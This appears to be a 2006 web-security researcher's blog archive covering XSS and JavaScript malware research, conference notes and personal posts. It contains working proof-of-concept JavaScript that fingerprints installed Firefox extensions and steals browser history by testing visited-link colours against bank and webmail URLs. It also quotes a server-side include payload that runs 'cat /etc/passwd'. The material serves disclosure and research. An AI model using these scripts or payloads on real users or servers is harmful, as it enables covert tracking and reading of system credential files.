Wednesday, August 30, 2006

Details on the AT&T online store hack (yours truly quoted)

AT&T Hack Highlights Web Site Vulnerabilities.

But that's not the reason I'm blogging it. The part I'm finding interesting was that the AT&T website in question was actually being operated by an undisclosed third-party (how fortunate for them). Not AT&T. With organizations of any size its a common practice to contract with a partner to manage a portion or even a feature of a web presence. Web Banks do it with bill-pay, Online Stores with checkout, News Agencies host images with Akamai, etc. Few of any major web presences anymore can be considered pure.

For many reasons outsourcing specific pieces makes sound business sense. No need to build the infrastructure, software, staff, and figure out everything else you might now consider ahead of time. Pay a monthly/annual fee and your good to go with better ROI. However, what's commonly forgotten from a security perspective is that its YOUR NAME on the front of the website, not your partners. When that third-party run website is hacked, your the one getting the nasty customer calls and negative headlines! You should at least be monitoring the security of the vendor hosted website as often as your own.

Monday, August 28, 2006

What I learned as a customer

Last week I hosted a WhiteHat Security webinar for a couple hundred people that ended in a spectacular failure. (To be polite I'll leave out the name of the third-party service provider, but lets just say they're a really big company and it was all they’re fault.) The experience was very disappointing as this was an exciting event as an encore to the Black Hat presentation. A couple of days later something hit me. I became a customer again rather than a vendor! I was put directly in my customer’s shoes. Reminded about why I started WhiteHat Security and what information security professionals provide to those who depend on us. A level of confidence that someone is making sure nothing will go wrong. Let me provide some background.

I'm not comfortable with webinars. I'm used to performing demonstrations LIVE when if something blows up, a common occurrence, that I have a backup plan. Normally the audience never notices. Choosing a hosted solution was the first decision because it doesn’t make sense to build our own infrastructure. We did our homework. We selected a vendor that knows what they were doing, even if they’re comparatively more costly than the alternatives. For us, that part didn't matter much. The solution felt smooth and stable and we were willing to pay for that. This is better than inviting our guests to a shoddy event. Every buying decision we made was on the basis of confidence.

The morning of the webinar the hosted backend system died crashing many other in-progress webinars, booting the attendees, and myself unable login with sporadic connections. After realizing the problem was not on our end, we we're forced to apologize to our attendees and end the webinar early. These things happen sometimes and there’s not a lot you can do about it (damn that Murphy). Do we regret our selection decision? No. What you want to be able to say is you did everything you could to prevent a bad situation. That’s what we did.

An information security professionals job is helping organizations make sure nothing happens. Or at least put off that eventuality for as long as possible. For security assessment providers like myself, we serve that goal by identifying vulnerabilities so they can get fixed before the bad guys exploit them. And I said before, "The reality is someone only needs a single vulnerability to exploit you and cause you to have a really bad day." Organizations depend on us to find all the vulnerabilities all the time. Sure they could do it themselves, which is fine, but that’s not the point. The point is reaching “a level of confidence that someone is making sure nothing will go wrong.” That's what I was reminded of. We do a lot more than just find vulnerabilities.

So much web application security research, so little time

The amount of research going on in web application security and especially JavaScript Malware is simply astounding. I'm having a difficult time keeping up with what people are releasing and dedicating time to my own research. I wish I could give the following links more background information, but these are some things that have popped up over the last week that I'll be reading into. They should be of interest to others as well.


Backdooring Web Pages
IMHO, there are three types of web page backdoors: non-persistent, persistent and global persistent. Non-persistent backdoors occur on a single XSS vulnerable page (hit). Persistent backdoors a bit better because they can occur on one or more XSS vulnerable pages most probably coming from the same domain (site). Global persistent backdoors occur on all domains (sites) and in theory they can last forever.

XSS in CBNEWS and BBC
George Bush appoints a 9 year old to be the chairperson of the Information Security Deportment

Stealing History (Part 2)
Cody Swann has a modified version of the exploit using prototype that works in IE and has support for AJAX requests:

Response Splitting Filter Evasion
While playing with a redirection issue on a pretty major website I found a pretty weird HTTP response splitting issue, where forward slashes were not allowed (or rather, once you entered a forward slash it caused the whole redirection to be removed). Clearly the website was trying to protect itself from something, although I’m not exactly sure how or why. Here’s what I ended up doing.

US-ASCII and EUC-JP Character Injection
I spent a little time this weekend playing with my XSS fuzzer, which I am trying to get to a point where I can release it, for other researchers to play with. In doing some preliminary testing I’ve found a number of issues worth mentioning to anyone doing this form of research. Cheng Pang Su and I have been working on some of the more advanced variable width encoding, and I’ll release more on that later, as I’ve found a number of additional issues. In doing that, I have expanded the fuzzer to look at additional character encoding methods, which is how I began finding these.

AttackAPI
Provides simple and intuitive web programmable interface for composing attack vectors.

Scan for HTML Injection
This little tool scans a page for common XSS/HTML injection vulnerabilities.

BeEF
BeEF is the browser exploitation framework. Its purposes in life is to provide an easily integratable framework to demonstrate the impact of browser and cross-site scripting issues in real-time. The modular structure has focused on making module development a trivial process with the intelligence existing within BeEF.

CSRF Adds Your Feed To my.yahoo.com
In all the recent waves of RSS hacks, I thought I’d toss in another. This isn’t breaking in using RSS, but it is a method to get people to add your feed automatically. Yahoo is vulnerable to cross site request forgeries (CSRF) for logged in users to automatically add your RSS feed to their page:

Warhol Worm Becomes Spam Gateway
Our innocent little Warhol worm has begun making it’s rounds. There are some serious additional implications that have not been thought through completely. One thing that unsticky brought to my attention was the use of a Warhol work for spamming. He correctly diagnoses a problem in myyearbook.com but takes it to the next step and describes what it would take to build a Warhol XSS worm.

Stealing User Information Via Automatic Form Filling
One of the most annoying things for many users is filling in form fields on websites. It’s tedious for them to type the same information over and over again, especially when it’s something a simple as a their personal information like name, phone number, address, credit card number, expiration date, and the like. Unfortunately this can spell trouble for many users who use websites that are vulnerable to XSS.


See what I mean? A LOT!

Friday, August 25, 2006

I know what you've got (Firefox Extensions)

Update: I removed the JS PoC from the template. Was messing up IE.

Update
: Some generous person, who sadly didn't leave their name, supplied me with a bunch more Firefox Extension signatures. Way cool! I updated the PoC code on the blog. Enjoy!


RSnake discovered a great way to detect installed Firefox extensions using the chrome: protocol handler. I liked it so much and in keeping CSS/JS History Hack, I just had to have some proof-of-concept code for the blog. I improved upon his design a bit, making it more complete as far as popular extensions go and easier to add new signatures. On the right side column look for the "I know what you've got" heading. Below you should see a list of detected extensions, if any. Again, I'm not capturing this data, just redisplaying it.

The chrome protocol handler enables reaching into the FF browser extensions folder to access image resources. For instance the Google Toolbar has chrome://google-toolbar/skin/icon.png. For detection create an IMG DOM Object with an onload event handler. If the onload event handler fires, you know the extension is there because the URL is unique.

I put in signatures for Adblock Plus, Auto Copy, ColorZilla, Customize Google, DownThemAll, Faster Fox, Flash Block, FlashGot, Forecastfox, Google Toolbar, Greasemonkey, IE Tab, IE View, JS View, Live HTTP Headers, MeasureIt, SEO For Firefox, SEOpen, Search Status, Server Switcher, StumbleUpon, Tab Mix Plus, Torrent-Search Toolbar, User Agent Switcher, View Source With, Web Developer.

Source:
// popular extensions.
var e = {
"Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png",
"Auto Copy" : "chrome://autocopy/skin/autocopy.png",
"ColorZilla" : "chrome://colorzilla/skin/logo.png",
"Customize Google" : "chrome://customizegoogle/skin/32x32.png",
"DownThemAll!" : "chrome://dta/content/immagini/icon.png",
"Faster Fox" : "chrome://fasterfox/skin/icon.png",
"Flash Block" : "chrome://flashblock/skin/flash-on-24.png",
"FlashGot" : "chrome://flashgot/skin/icon32.png",
"Forecastfox" : "chrome://forecastfox/skin/images/icon.png",
"Google Toolbar" : "chrome://google-toolbar/skin/icon.png",
"Greasemonkey" : "chrome://greasemonkey/content/status_on.gif",
"IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png",
"IE View" : "chrome://ieview/skin/ieview-icon.png",
"JS View" : "chrome://jsview/skin/jsview.gif",
"Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png",
"MeasureIt" : "chrome://measureit/skin/measureit.png",
"SEO For Firefox" : "chrome://seo4firefox/content/icon32.png",
"SEOpen" : "chrome://seopen/skin/seopen.png",
"Search Status" : "chrome://searchstatus/skin/cax10.png",
"Server Switcher" : "chrome://switcher/skin/icon.png",
"StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png",
"Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png",
"Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png",
"User Agent Switcher" : "chrome://useragentswitcher/content/logo.png",
"View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png",
"Web Developer" : "chrome://webdeveloper/content/images/logo.png",
"Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png",
"UrlParams" : "chrome://urlparams/skin/urlparams32.png",
"NewsFox" : "chrome://newsfox/skin/images/home.png",
"Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png",
"GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png",
"QuickJava" : "chrome://quickjava/content/js.png",
"Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png",
"BBCode" : "chrome://bbcode/skin/bbcode.png",
"BugMeNot" : "chrome://bugmenot/skin/bugmenot.png",
"ConQuery" : "chrome://conquery/skin/conquery.png",
"Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png",
"Extended Cookie Manager" : "chrome://xcm/content/allowed.png",
"FireBug" : "chrome://firebug/content/firebug32.png",
"FoxyTunes" : "chrome://foxytunes/skin/logo.png",
"MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png",
"SessionSaver .2" : "chrome://sessionsaver/content/ss.png",
"spooFX" : "chrome://spoofx/skin/main/spoofx.png",
"Statusbar Clock" : "chrome://timestatus/skin/icon.png",
"Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png",
"UnPlug" : "chrome://unplug/skin/unplug.png",
"View Source Chart" : "chrome://vrs/skin/vrssmall.png",
"XPather" : "chrome://xpather/content/iconka.png",

};

if (is_mozilla) {
showExtensions();
}

function showExtensions() {
for (var i in e) {
var img = document.createElement("img");
img.setAttribute("border", '0');
img.setAttribute("width", '0');
img.setAttribute("height", '0');
img.setAttribute("onload", "document.getElementById('ext').
appendChild(document.createElement('li')).innerHTML='" + i + "'");

img.setAttribute("src", e[i]);
}

}

If you have more signatures with extension names and unique-chrome-url, comment them in and I'll add them to the list. And I agree with RSnake that we'll have to dig deeper into the chrome handler to see if any issues exist with the extensions. So much research, so little time.

Driving off with the fuel pump

As most have, I've seen all those "funny pictures" of people driving down the street with a fuel pump hanging out of their gas tank. Last night, I got to see it for myself first hand! Unfortunately the event turned out to be anti-climatic. No gas geysers, people running for cover, or the attendant screaming "OMG!". Actually, he only seemed annoyed. Like he'd seen it happen a hundred times before. Oh well.



Thursday, August 24, 2006

Staying secure by getting out of the line of fire

Its difficult to know if a piece of software is more secure than another. Yet this doesn't stop anyone from hollering Trustworthy Computing! Unbreakable! Security in the SDLC! h0HO 0Wn3D j00! This fuels never ending debates, "Is Windows more secure than OS X?", "How about Firefox and Internet Explorer?" "IIS and Apache?". Lets face facts, all software has vulnerabilities, that is unless is has zero bugs. I don't think anyone buys that one. What matters to us all is, "How do I not get hacked?".

There are people who gauge hackability by the number of known vulnerabilities in a software product. "Hey! My OS has less had vulnerabilities than yours! Neener Neener Neeeeeener." C'mon, this metric isn't helpful as it fails to inform me about how likely I'd be to NOT GET HACKED. It could be that researchers are not looking for vulnerabilities in that product, vulnerabilities are counted in strange ways, people are not disclosing the issues, or a dozen other things. The reality is someone only needs a single vulnerability to exploit you and cause you to have a really bad day. The bad guys know that. What if we took a different approach, like...

Getting out of the line of fire.

The real deal is criminals are profit-driven and the cyber types are no different. They're in it the money. For them targeting the lowest common denominator of their victims makes the most sense. Sure, some hackers are after the fame of being the best or the first to hack a particular difficult system. These glory-driven types are not the ones you need to worry about. The 21 century crimes are fraud and identity theft. If you were a cyber-criminal, would you go after the product that has 95% market share or the 5% market share? Yah me to. Sorry Microsoft, that means you.

Mind you, security isn't the primary reason I choose to use OS X and Firefox. I use them because the software allows me to be more productive than anything else available. I have no use for something that is highly secure, but doesn't allow me to work proficiently by myself and with others. Sorry OpenBSD, that means you. Or something that is so far out of the way, that I can't get my work because there's no software. Sorry Amiga, that means you.

Do I think OS X and Firefox are more secure than Windows or IE? Yes, I "think" so. But I don't "know" for sure and the truth is I really don't care. What I do know is the chances of me getting hacked on my PowerBook vs. the next guy using a dude-your-getting-a-dell is night and day. I mean, PC users are in a war for control for their own machine. Who needs that headache!? Am I saying that by using OS X and Firefox I'm 100% safe. No way. Though I have got out of the way and decreased my chanced of getting hacked. That's what important.

Now watch, tomorrow some 0-day will own me and I'll be eating crow for the rest of 2006.

Wednesday, August 23, 2006

Web security is completely broken

This was my first thought when a friend of mine, Dennis Groves, asked my opinion on the current state of web application security. In light of the recent research by myself and several other experts, JavaScript Malware breaks all the security models to the point where its very VERY difficult to protect yourself or your websites, even if your one of the people in "the know". Leaving 90% of people out there without adequette security. This is why its vital that developers and information security professionals learn about these new attacks and understand how it impacts them.

Don't believe for a moment SSL, firewalls, patching, anti-virus, anti-spam, anti-phishing solutions, two-factor auth, or anything else like that helps. Clicking on the wrong link or visiting a website at the wrong time (especially popular websites) and you could be infected. The fact that 9 out of 10 websites has a cross-site scripting (XSS) vulnerability make the situation just that much worse!

As much as I am a vendor who assists organizations secure their websites, I'm also a user. I buy, bank, post, comment, read, and perform other online activities just like everyone else. What worries me is that once JavaScript Malware owns my browser, and I have no idea when that happens, it litterally has more control over my browser than I do. I am powerless should the JavaScript Malware instruct my browser to:
  • Hack someone else website
  • Port scan and hack intranet websites
  • Access illegal content on the Web
  • Transfer money out of my bank account
  • Display a fake login page to steal my passwords
  • Steal my keystrokes
... there is no end to the evil...

Fortunately the black hat community has not yet begun wide-scale exploitation, YET. But they are researching, communicating, experimenting and fine tuning their own code. Don't believe me? Just have a look at who's most interested in XSS. New malicious attacks will happen, its just a matter of time and a question of how bad.

So now what?

For website owners, the bottom line is your going to have to find and fix your XSS vulnerabilities before the bad guys exploit them. And they are looking, that I know for sure. Users, turning off JavaScript is an option, even though its not a great one. Doing this will break many websites we all visit and become annoying, but hey, it might be worth the trade-off due to a lack of better options.

As for myself, I periodically switch between researching new attack and defense techniques. Attack research has surged forward and we have a good idea of where the edge is. I'll be going back to researching defense strategies and seeing what new effective approaches will mitigate today's risk.

Monday, August 21, 2006

Sometimes its just that simple

I was talking with a couple of security folks about my CSS/JS History Hack, two had come up with some very simple and elegant solutions.

Richard Bejtlich (TaoSecurity):
"I don't keep a browsing history (days = 0) on Firefox so I have nothing to show"


Ryan Barnett:
"Obviously, the CSS trick just tries to load a page with a link to the target websites and then looks at the color of the hyperlink to determine if the it has been visited. This is based off of the browser preferences settigs for links/visited links. If I change the color of my visited links to the same color as non-visted ones, then the cute trick didn't work. The problem is that this would still extremely effective as how many actual users would go into their browserr settings a tweak this? That's right, not many."


Two tricks that some power users can try out.

Friday, August 18, 2006

SSI Injection instead of JavaScript Malware

Update:
Wouldn't ya know it, RSnake has in his XSS filter evasion is something just like this for persistent XSS. Including one with a PHP Injection. The question about non-persistent XSS leading to SSI Injection is still up in the air though.

While everyone is busy hacking the browser when it comes to JavaScript Malware, Ryan Barnett is researching the possibility of Server-Side Include (SSI) Injection using the same attack vector. He ran his ideas by me earlier today...
"I noticed through numerous tests that they were running on Apache and
that they had some default configs set. One of these settings is
"Options Includes" which allows for Server-Side Include parsing of
pages. Anyways, instead of submitting the normal "<>alert('XSS
Alert')< /script>" XSS injection code, I used this -

< !--#exec cmd="cat /etc/passwd" -->

and it showed the contents of the passwd file in the returned page."

I've seen this behavior happen from time to time in the same areas where you might find persistent XSS. But only rarely. Ryan goes on to speculate about possible SSI Injection where non-persistent XSS typically occurs.
"While this does work, it doesn't work in all circumstances. After
some testing, I found that this will not work in reflected XSS. It
needs to be stored XSS as it needs to be stored in a page first and
then the page is parsed for SSI. This attack also doesn't work with
normal CGI pages but might work with other scripting languages.

The bottomline is this - where ever you find XSS input validation
issues, you should try different SSI strings to see if you can get OS
commands to execute in the returned page. "
I can't say that I've seen this behavior personally. We'll start doing our wider testing on this since it sounds plausible. Anyone else would care to chime in if they've seen this behavior?

Thursday, August 17, 2006

Denial of Service in BofA via Sitekey

Vulnerability of Passmark Sitekey at Bank of America reported
"Sestus Data Corporation announced today the discovery of a vulnerability of the Passmark Sitekey login approach at Bank of America that could permit an attacker to remotely lock out thousands of customers from their online banking accounts."

This type of issue happens often in websites, especially those with millions of users, when implementing hard and fast rules in anti-brute force. When you have millions of users, just about every guessable username is taken. At that point its trivial for someone to automatically fail login attempts and block your users from logging in. This was a popular tactic in on-line auctions to block competitive bidders. It’s incredibly frustrating for users when this happens.

A better way to tackle anti-brute force in a web environment is to use CAPTCHA's when a threshhold has been reached. Sure a bad guy can keep guessing passwords and filling out those crazy images (a few seconds per), but if you have any kind of password policy in place, your risk here is minimal.

Who is interested in XSS?

In the last 12 months, the good guys and bad guys alike have learning about the risks posed by XSS at a furious pace. From the SEO's (search engine optimizers) to casual researchers to phishers to security vendors to infosec professionals, everyone is trying to get a handle on what the most recent research means to them. The key JavaScript Malware issues we've seen are worms, defacements, phishing scams, port scanners, intranet hacking, web server fingerprinting, and history stealing. This is likely just the beginning as the exploits become more refined and of course malicious.

Taking a look a the mainstream press, Brian Krebs from the WashingtonPost blogged "Cross-Site Scripting Flaws Abound". Among other things Brian talk XSS disclosures in the websites of Verisign, eEye Digital Security, Cisco Systems, F-Secure, Snort.org, the National Security Agency, eBay, and Amazon. There is a running thread on SecurityLab about additional vulnerabilities in IBM, MSN, CyberTrust, etc. If there was ever any question, XSS vulnerabilities are epidemic. Just about every website has A LEAST one. No one is safe, not even security vendors.

Also, I member of some public and private bulletin boards that helps me stay up to date on whos doing what and for what reasons. For instance SEO's are utiziling XSS to boost website ranking by making it appear that popular websites are linking to their websites. Simple XSS-Defacement exploit, where the defacement is a a href link injection. And I can tell you right now, the websites they are targeting a big.

RSnake clued me into this, check it out from Google Trends searching for XSS and Cross Site Scripting:





The U.S. didn't even make the Top 10 in "XSS" and only 6th in "Cross Site Scripting". Those who do top the list tell a compelling story about who is THE MOST interested. JavaScript Malware is the new shell code, time to get prepared.

CSS/JS History Hack ported to Internet Explorer

I've been traveling the last few days and there has been so webappsec news recently. Let's see if I can catch up.

pdp (architect) from gnucitizen has ported my JavaScript/CSS visited link scanner over to Internet Explorer. I haven't tried it out myself, since I run a mac, but this should help out the Windows guys in learning about this stuff.
"The POC presented here is my improved version of the POC presented in BlackHat. I made it work well in IE6, IE7, Firefox and Opera. IE6 has very nasty disabilities when dealing with dynamically generated style sheets. However, these can be easy sorted out by reusing the current style sheet. If you are interested how it works just read the provided source code."
Upon inspection of the rest of pdp's projects, a lot his other PoC code projects look really interesting to any webappsec person. Including a JavaScript Authorization Forcer, JavaScript Address Info, XSSing the LAN, and another JavaScript port scanner. JavaScript Malware is truly the new shell code and we can expect a lot more research to continue in this area.

Friday, August 11, 2006

I know where you've been

Update 2: CSS History Hack Demonstration code available. Thank you to RSnake for hosting.

Update: Removed the JS PoC from the template and pasted it below. Was messing up IE.

I updated the blog template to display some proof-of-concept browser history stealing JavaScript code. On the right side column notice the "I know where you've been" heading. Below that, if your using Firefox, Mozilla, Netscape or Safari, you should see a bunch of links to websites you've been to. Don't worry, I'm not capturing this data, only you can see it, though it does prove a point. This trick probably works in Internet Explorer, though I haven't tried to port the code to find out for sure. I wonder how long until the marketers start using this for additional visitor profiling. Feel free to view-source and find the trick.

var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
"http://ajaxian.com/",
"http://digg.com/",
"http://english.aljazeera.net/HomePage",
"http://ha.ckers.org",
"http://ha.ckers.org/blog/",
"http://jeremiahgrossman.blogspot.com/",
"http://login.yahoo.com/",
"http://mail.google.com/",
"http://mail.yahoo.com/",
"http://my.yahoo.com/",
"http://reddit.com/",
"http://seoblackhat.com",
"http://slashdot.org/",
"http://techfoolery.com/",
"http://weblogs.asp.net/jezell/",
"http://www.amazon.com/",
"http://www.aol.com/",
"http://www.bankofamerica.com/",
"http://www.bankone.com/",
"http://www.blackhat.com/",
"http://www.blogger.com/",
"http://www.bloglines.com/",
"http://www.bofa.com/",
"http://www.capitalone.com/",
"http://www.cenzic.com",
"http://www.cgisecurity.com",
"http://www.chase.com/",
"http://www.citibank.com/",
"http://www.cnn.com/",
"http://www.comerica.com/",
"http://www.e-gold.com/",
"http://www.ebay.com/",
"http://www.etrade.com/",
"http://www.expedia.com/",
"http://www.google.com/",
"http://www.hsbc.com/",
"http://www.icq.com/",
"http://www.jailbabes.com",
"http://www.microsoft.com/",
"http://www.msn.com/",
"http://www.myspace.com/",
"http://www.ntobjectives.com",
"http://www.passport.net/",
"http://www.paypal.com/",
"http://www.sourceforge.net/",
"http://www.spidynamics.com",
"http://www.statefarm.com/",
"http://www.usbank.com/",
"http://www.wachovia.com/",
"http://www.wamu.com/",
"http://www.watchfire.com",
"http://www.webappsec.org",
"http://www.wellsfargo.com/",
"http://www.whitehatsec.com",
"http://www.xanga.com/",
"http://www.yahoo.com/",
"http://seoblackhat.com/",
"http://www.alexa.com/",
"http://www.youtube.com/",
"https://banking.wellsfargo.com/",
"https://commerce.blackhat.com/",
"https://online.wellsfargo.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {

var d = document.createElement('div');
d.id = 'xss_flag';
document.body.appendChild(d);

var d = document.createElement('table');
d.border = 0;
d.cellpadding = 5;
d.cellspacing = 10;
d.width = '90%';
d.align = 'center';
d.id = 'data';
document.body.appendChild(d);

document.write('');
for (var i = 0; i <>');

/* launch steal history */

if (is_mozilla) {
stealHistory();
}

}

function stealHistory() {

// loop through websites and check which ones have been visited
for (var i = 0; i < websites.length; i++) {
var link = document.createElement("a");
link.id = "id" + i;
link.href = websites[i];
link.innerHTML = websites[i];
document.body.appendChild(link);
var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
document.body.removeChild(link);
// check for visited
if (color == "rgb(0, 0, 255)") {
document.write('' + websites[i] + '');
} // end visited check

} // end visited website loop

} // end stealHistory method

Where have I been?

I've attended and presented at tons of conferences all over the world. I've also visited quite a number of companies in and around silicon valley. During that time I've been collected the badges from those venues and pinned them to my cube wall. Its become a timeline, but without the organization. In the mess you can make out badges from BlackHat, Defcon, RSA, ISSA, ISACA, eBay, Yahoo, ToorCon, and the private parties in between. Maybe they'll be worth something someday. Which of these do you still have?




Home from BlackHat and Defcon

I've been busy busy busy since I got home from BlackHat. And probably more busy in the next coming week.

TC and I gave our JavaScript Malware talk (Hacking Intranet Websites from the Outside) to a packed 1,000 plus audience. Everyone was completely engaged and we opened a lot of eyes. XSS and JavaScript Malware is no longer the kind and gentle vulnerability is used to be. Lots of press were in also attendence, including Brian Krebs from the Washington Post who called the presentation "rather disturbing". The media attention has been crazy (USA Today, eWeek, Infomation Week, you name it). I think we even scared most of the experts with the demos. Everyone ran home and changed the p/w on their DSL router. :) Tons of people stopped us during the remaining BH and Defcon saying that we had the best talk. For a presenter, there is no better feedback. We'll chalk this one up as a 100% success. Slides and PoC available for download.

Beyond the show itself we hung out with RSnake, Arian Evans (and g/f), Andrew van der Stock, Bob Auger, Danny Allen, Kurt Roemer, Erik Peterson, Matt Fisher, Billy Hoffman, and a bunch of others from SPI/Cenzic/Watchfire and elsewhere. We had an absolute blast. And the WASC meet-up at the Shadow bar was great fun as well. About 30 people attended with lots of laughs and stories. This is really why you attend the infosec conferences. You never know what exactly your going to learn or who your going to meet. RSnake has some Defcon pictures here. I posted some below.


Arian sporting an approving grin moments before security guards surrounded his laptop. We must have been the only shady looking hacker type characters at Defcon. Riiiiiiight. :)



RSnake and Andrew van der Stock at breakfast



The akward moment between Billy and RSnake


Matt in his B-Day chair at 4am breakfast



Robert in his classic hacker superman pose



TC and Matt doing SamBuca shots while they light each others mouth on fire.

Thursday, August 10, 2006

Me on TV again, but this time not for security

I play austrailian rules football (footy) on the weekends. Our local league, The Golden Gate Australian Rules Football League (GGAFL), was featured on the Channel 2 evening news (clip below). If you know what I look like, you can catch me in several of the frames (#29). For those not familiar with the game (americans) its like a cross between soccer and american football. Constant running and field action with the hard hitting of football. No helmets, no pads, I love it. Been playing for about 3 years. There is also a slowmo clip of me going for a ruck, kinda like the tip-off in basketball. The day this game was filmed it was hot hot hot, 115 deg hot (pic below).